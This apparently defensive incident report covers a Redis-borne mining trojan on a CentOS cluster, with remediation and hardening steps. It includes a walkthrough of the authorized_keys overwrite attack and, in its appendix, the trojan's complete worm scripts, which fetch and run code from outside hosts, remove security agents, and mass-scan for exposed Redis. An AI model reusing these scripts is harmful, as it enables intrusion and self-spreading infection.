Alibaba Cloud ECS CentOS 7.9 cluster: Redis service hit by a trojan

# Background
Alibaba Cloud ECS CentOS 7.9 cluster: hadoop202, hadoop203, hadoop204
hadoop202 runs the redis-server service
redis.conf settings:
#bind 127.0.0.1
protected-mode no
#requirepass
hadoop202, hadoop203 and hadoop204 have passwordless SSH configured between them
# Trojan intrusion on all 3 machines
High CPU usage
~/.ssh/authorized_keys tampered with
crontab entries tampered with: /etc/newinit.sh is run on a schedule
root's command binaries and file permissions tampered with
root login on hadoop204 shows the prompt -bash-4.2$

I. Intrusion through the Redis weakness, trojan implanted
Problems:
1. crontab entries tampered with
2. crontab entries cannot be modified: permission denied
3. ~/.ssh/authorized_keys tampered with, and root cannot modify or delete it
4. su - root gives the prompt -bash-4.2$

[root@hadoop202 ~]# crontab -l
*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1

[root@hadoop202 ~]# crontab /opt/module/crontab/myjobs
/var/spool/cron/#tmp.hadoop202.XXXXEE0z37: 权限不够

[root@hadoop202 .ssh]# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1

II. Fixing problems 1 and 2: stop the trojan and remove the scheduled job
# Inspect /var/spool/cron/root and /etc/newinit.sh => this script changes chattr's permissions to 444, tampers with authorized_keys and the cron job, and sets the extended attributes +iae on those files
cat /var/spool/cron/root
*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1

# Stop the crond service. Important!!!!
systemctl stop crond
systemctl status crond

# Cron job: inspect the file's extended attributes
[root@hadoop202 cron]# lsattr /var/spool/cron/root
----ia-------e-- /var/spool/cron/root

# chattr: restore its permissions
chmod 755 /usr/bin/chattr

# Cron job: clear the extended attributes
chattr -iae /var/spool/cron/root

# Cron job: fix permissions, then delete
chmod 755 /var/spool/cron/root
rm -f /var/spool/cron/root

# Delete /etc/newinit.sh
rm -f /etc/newinit.sh

# Configure new cron jobs
lsattr /var/spool/cron/ # no i or a attribute is shown
chattr -ia /var/spool/cron/ # run this line anyway
touch /var/spool/cron/a # files can now be created
rm -rf /var/spool/cron/root # and deleted
crontab /opt/module/crontab/myjobs # new cron jobs can now be installed
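The recovery steps above amount to a manual triage: find the files the script locked with chattr and the cron entries it planted. The following is an added example, not part of this write-up, that automates those two checks. Both functions read lsattr or crontab output on stdin, so the constructed samples embedded here (the first lsattr line is the one shown above; the other lines, including the 203.0.113.10 address, are made up) can be swapped for live output on an affected host.

```sh
#!/bin/sh
# Added example, not part of the original write-up: triage helpers for the
# persistence seen above. Both functions read text on stdin so they run
# against the constructed samples below and against live output on a host:
#   lsattr /var/spool/cron/* /root/.ssh/authorized_keys | find_locked_files
#   crontab -l | flag_cron_lines

# Print the paths in lsattr output whose flag field carries i (immutable) or
# a (append-only). Files with these flags resist root's rm/chmod/echo until
# `chattr -ia` is run, which is exactly what the recovery steps do.
# Caveat: lsattr's second field is the path, so a path containing spaces is
# truncated; fine for the cron spool and ~/.ssh, not for arbitrary trees.
find_locked_files() {
    awk 'NF >= 2 && $1 ~ /^[-A-Za-z]+$/ && ($1 ~ /i/ || $1 ~ /a/) { print $2 }'
}

# Print crontab lines that match the persistence pattern of this incident:
#   (a) a download tool (curl/wget, or the renamed copies cd1/wd1 that
#       newinit.sh leaves behind) whose output is piped into sh/bash, or
#   (b) sh/bash run directly on a script under /etc, /tmp or /var/tmp.
# Exit status is grep's: 0 if at least one line was flagged, 1 if none.
flag_cron_lines() {
    grep -E \
        -e '(curl|wget|cd1|wd1)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)' \
        -e '(^|[[:space:]])(ba)?sh[[:space:]]+/(etc|tmp|var/tmp)/'
}

# Constructed sample of lsattr output as it looked after the intrusion (the
# first line is the one quoted above; the rest are made up).
SAMPLE_LSATTR='----ia-------e-- /var/spool/cron/root
-------------e-- /var/spool/cron/hadoop
----ia-------e-- /root/.ssh/authorized_keys
-------------e-- /root/.bashrc'

# Constructed crontab: the line from the incident, an attacker-style fetch
# piped into sh (placeholder TEST-NET address), and two benign jobs that
# must not be flagged.
SAMPLE_CRON='*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1
0 2 * * * /usr/local/bin/backup.sh
*/2 * * * * cd1 -fsSL http://203.0.113.10/init.sh | sh
*/5 * * * * /usr/bin/curl -s https://monitor.example.invalid/ping > /dev/null'

# Run both checks over the samples and report. Returns 0 when the expected
# findings (2 locked files, 2 flagged cron lines) are present.
triage_samples() {
    locked=$(printf '%s\n' "$SAMPLE_LSATTR" | find_locked_files)
    flagged=$(printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines) || true
    echo "Locked files (need chattr -ia before they can be fixed):"
    printf '%s\n' "$locked"
    echo "Suspicious cron lines:"
    printf '%s\n' "$flagged"
    [ "$(printf '%s\n' "$locked" | wc -l | tr -d ' ')" -eq 2 ] &&
    [ "$(printf '%s\n' "$flagged" | wc -l | tr -d ' ')" -eq 2 ]
}

triage_samples
```

Run the same two functions over the other cron spools (/etc/cron.d, /etc/crontab) as well, since the second-stage script shown in section IX writes to all of them.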

# Summary
The crontab entry was added through the /var/spool/cron/root file
The /etc/newinit.sh script does several things:
1) changes the permissions of some command binaries, e.g. chattr and chmod
2) tampers with authorized_keys, overwriting it with the key of the uc1 account
3) sets extended attributes on some files, e.g. chattr +iae /root/.ssh/authorized_keys, so they cannot be deleted or modified
4) runs curl -fsSL http://195.242.111.238/cleanfda/is.sh | bash

# Cause:
Intrusion through the Redis weakness; trojan implanted

# Flow:
redis-cli connects to redis-server -> SSH public key written into Redis -> the key is dumped over .ssh/authorized_keys and the file gets the extended attributes +ia
-> .ssh used to locate the other cluster hosts, which have passwordless login configured

-> crontab entry implanted, usually a .sh script that runs the trojan: mining (download, mount disks, run tasks) -> CPU, bandwidth and disk consumed

-> the trojan processes guard each other: kill one and the other restarts it

-> file and command permissions and file contents are reset on a schedule, e.g. authorized_keys, chattr, chmod

# Note:
The intrusion comes in through the port Redis exposes; closing the port or restricting which IP addresses may reach it prevents it.
After rebooting the Alibaba Cloud server with Redis not started, CPU usage returned to normal.

III. Fixing problem 3: reconfigure SSH and set the +i attribute on the file
# Prepare authorized_keys on hadoop202, hadoop203 and hadoop204
cd /root/.ssh
chattr +ia authorized_keys
lsattr authorized_keys

IV. Fixing problem 4: su - root on hadoop204 gives the prompt -bash-4.2$
# Cause:
/root has no .bash_profile or .bashrc file

# Fix:
Copy the two files over from hadoop203 and login works normally again

V. Other repairs
# Restore curl and wget
mv /usr/bin/cd1 /usr/bin/curl
mv /usr/bin/wd1 /usr/bin/wget

# Remove the redis user
cat /etc/passwd
userdel -r redis

VI. Fixing the Redis security weakness
(1) Configure redis.conf to require a password
vim /opt/module/redis-3.2.5/redis.conf
#bind 127.0.0.1
# To enable protected mode, uncomment bind and set protected-mode yes; only then does it take effect
protected-mode no
daemonize yes
# Clients connecting to redis-server must supply the password
requirepass <complex password>

# Note: what bind means
# Local machine's public IP: 58.xxx.xx.xx
bind 58.xxx.xx.xx 127.0.0.1
Startup fails: Creating Server TCP listening socket 58.xxx.xx.xx:6379: bind: Cannot assign requested address
# Cause
Binding to certain IPs does not mean those IPs are allowed in; it means the Redis service only listens on the given local addresses, i.e. other machines can only reach redis-server through those addresses
# How to whitelist the hosts allowed to access redis-server
Only through the firewall or the security group

(2) Alibaba Cloud security group configuration
Port 6379: restrict the authorized sources
Port range            | Authorized source                 | Description
Destination 6379/6379 | Source: local machine's public IP | Redis port: allow the local machine's public IP
Destination 6379/6379 | Source: hadoop203 private IP      | Redis port: allow hadoop204
Destination 6379/6379 | Source: hadoop204 private IP      | Redis port: allow hadoop203

(3) Start the service on hadoop202, then test logins from hadoop203, hadoop204 and the local machine (localhost)
# Local machine connects to redis-server; host set to hadoop202's public IP
localhost:~ liunian$ redis-cli -h <hadoop202 public IP> -p 6379 -a <complex password>

# hadoop202 connects to redis-server; host set to hadoop202's private IP
[root@hadoop202 ~]# redis-cli -h <hadoop202 private IP> -p 6379 -a <complex password>

# hadoop203 connects to redis-server; host set to hadoop202's private IP
[root@hadoop203 ~]# redis-cli -h <hadoop202 private IP> -p 6379 -a <complex password>

# hadoop204 connects to redis-server; host set to hadoop202's private IP
[root@hadoop204 ~]# redis-cli -h <hadoop202 private IP> -p 6379 -a <complex password>

VII. Exactly how the Redis weakness lets .ssh/authorized_keys be overwritten
# Generate a key pair; the public key is saved as 1.txt
ssh-keygen -t rsa

# Write the public key file 1.txt from the .ssh directory into the target host's Redis memory via the redis-cli client
cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx

# Log in to the target with the client
./redis-cli -h 192.168.0.111
192.168.0.111:6379>config set dir /root/.ssh      # set the directory the key is saved to
OK
192.168.0.111:6379>config set dbfilename authorized_keys  # set the file name
OK

# From here root can SSH into the target host without a password and control the server

VIII. Impact of the Redis weakness and hardening
Impact of the Redis weakness:
When Redis is configured with "no IP restriction, no password", config set dir and config set dbfilename can be used to write an SSH public key file for the target host's root account, then SSH in directly and control the server
Data impact, business impact

Redis hardening:
Consider two aspects: network access and account access
Network access: 1. set up a firewall and restrict access to a whitelist; 2. harden redis.conf (the bind line);
Account access: 1. harden redis.conf with requirepass; 2. rename critical commands such as flushdb and flushall to the empty string, i.e. disable them
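As an added example covering both the redis.conf discussion in section VI and the hardening list above (it is not part of this write-up and not a Redis tool), here is a shell audit of a redis.conf for the settings this intrusion depended on. It flags a missing bind, protected-mode no, a missing or short requirepass, and CONFIG and FLUSHALL left un-renamed. The two sample configs are constructed: the weak one mirrors the settings quoted in the Background, the hardened one uses a placeholder address and passphrase.

```sh
#!/bin/sh
# Added example, not part of the original write-up or of Redis itself: a
# static audit of a redis.conf against the weaknesses this incident relied on.
# Reads the config on stdin, prints one finding per line, and exits 1 if any
# finding was printed. On a host: audit_redis_conf < /path/to/redis.conf
audit_redis_conf() {
    awk '
        /^[[:space:]]*#/ || NF == 0 { next }          # comments and blank lines
        $1 == "bind"           { bind_set = 1 }
        $1 == "protected-mode" { pmode = $2 }
        $1 == "requirepass"    { pass = $2 }
        $1 == "rename-command" && toupper($2) == "CONFIG"   { config_renamed = 1 }
        $1 == "rename-command" && toupper($2) == "FLUSHALL" { flushall_renamed = 1 }
        END {
            n = 0
            if (!bind_set) { print "bind missing: redis listens on every interface, public ones included"; n++ }
            if (pmode == "no") { print "protected-mode no: the fallback that refuses remote clients when bind and requirepass are both unset is switched off"; n++ }
            if (pass == "" || pass == "\"\"") { print "requirepass missing or empty: any client that can reach the port can run commands"; n++ }
            else if (length(pass) < 16) { print "requirepass shorter than 16 characters: weak against brute force"; n++ }
            if (!config_renamed) { print "CONFIG not renamed: CONFIG SET dir/dbfilename plus SAVE can write a dump into ~/.ssh or /var/spool/cron"; n++ }
            if (!flushall_renamed) { print "FLUSHALL not renamed: remote clients can wipe the dataset"; n++ }
            exit (n > 0)
        }'
}

# Constructed: the settings the compromised hadoop202 was running with
# (redis.conf as quoted in the Background).
WEAK_CONF='#bind 127.0.0.1
protected-mode no
daemonize yes
#requirepass foobared'

# Constructed: the same file hardened along the lines of section VIII.
# The private address and the passphrase are placeholders.
HARDENED_CONF='bind 10.0.0.12 127.0.0.1
protected-mode yes
daemonize yes
requirepass Example-Str0ng-Passphrase-2024
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command FLUSHDB ""'

# Return (print) the number of findings for the config text passed as $1.
count_findings() {
    printf '%s\n' "$1" | audit_redis_conf | wc -l | tr -d ' '
}

echo "== weak config =="
printf '%s\n' "$WEAK_CONF" | audit_redis_conf || echo "-> $(count_findings "$WEAK_CONF") findings, exit status 1"
echo "== hardened config =="
printf '%s\n' "$HARDENED_CONF" | audit_redis_conf && echo "-> no findings, exit status 0"
```

bind only limits the local addresses Redis listens on; as section VI found, it is not a client whitelist, so the audit merely checks that one is present, and the source restriction still has to come from the security group or firewall. Renaming CONFIG removes the primitive the section VII walkthrough uses (config set dir / config set dbfilename); if an application genuinely needs CONFIG, rename it to an unguessable string instead of the empty one.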

IX. Appendix: the trojan scripts
# Two stages: /etc/newinit.sh, and rs.sh, which is fetched over HTTP and executed
Stage 1: the scheduled script /etc/newinit.sh
#!/bin/sh
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ice-unix/… && chmod -R 777 .ice-unix && cd .ice-unix/…
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}' | xargs kill …
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y --exclude=procps* psmisc*
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
apt-get install -y masscan
apt-get install -y unhide
fi
if [ -x "$(command -v yum)" ]; then
dnf config-manager --set-enabled PowerTools
dnf config-manager --set-enabled powertools
yum install -y epel-release
yum install -y git iptables make gcc redis libpcap libpcap-devel
yum install -y masscan
fi
sleep 1
echo "Software Installed"

dddir="/usr/sbin/unhide"
$dddir quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks

downloads()
{
if [ -f "/usr/bin/curl" ]
then
echo $1,$2
http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/cd1" ]
then
http_code = `cd1 -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
else
cd1 --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/wget" ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f "/usr/bin/wd1" ]
then
wd1 --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=10 --tries=100 -O $2 $3
fi
fi
}

if ps aux | grep -i '[a]liyun'; then
downloads http://update.aegis.aliyun.com/download/uninstall.sh | bash
downloads http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"

if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://195.242.111.238/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd … && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://195.242.111.238/cleanfda/pnscan.tar.gz || $ccdira -q -O .x112 http://195.242.111.238/cleanfda/pnscan.tar.gz
sleep 1
[ -f .x112 ] && tar zxf .x112 && cd pnscan && ./configure && make && make install && cd … && rm -rf pnscan .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"

$bbdir -fsSL http://195.242.111.238/cleanfda/rs.sh | bash
$bbdira -fsSL http://195.242.111.238/cleanfda/rs.sh | bash

Stage 2: the script newinit.sh fetches and runs last, http://195.242.111.238/cleanfda/rs.sh (viewable in a browser)
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'config set stop-writes-on-bgsave-error no' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh\n\n"' >> .dat
echo 'config set dir "/etc/cron.d/"' >> .dat
echo 'config set dbfilename "zzh"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/etc/"' >> .dat
echo 'config set dbfilename "crontab"' >> .dat
echo 'save' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
for z in $( seq 0 5000 | sort -R ); do
for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
done
sleep 1
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's//([0-9]{2})//16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo "root runing…"
fi
